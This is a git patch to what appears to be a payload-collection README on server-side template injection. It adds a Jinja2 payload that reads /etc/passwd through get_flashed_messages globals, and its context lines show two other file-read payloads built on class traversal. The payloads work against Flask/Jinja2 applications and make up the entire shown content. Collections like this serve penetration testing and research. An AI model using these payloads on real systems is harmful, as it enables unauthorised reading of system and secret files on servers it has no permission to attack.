From 89429f9c4f302d33072d9f3ea28153ca3f95f9f5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E3=83=A0=E3=83=8F=E3=83=B3=E3=83=9E=E3=83=89?=
 <u9cc85@gmail.com>
Date: Mon, 18 Jan 2021 11:48:38 +0300
Subject: [PATCH] SSTI Payload in Jinja2 - Arbitrary file read

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index e8ad1da..fc4e7c0 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -381,6 +381,8 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
+# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
+{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
 ```
 
 ### Jinja2 - Write into remote file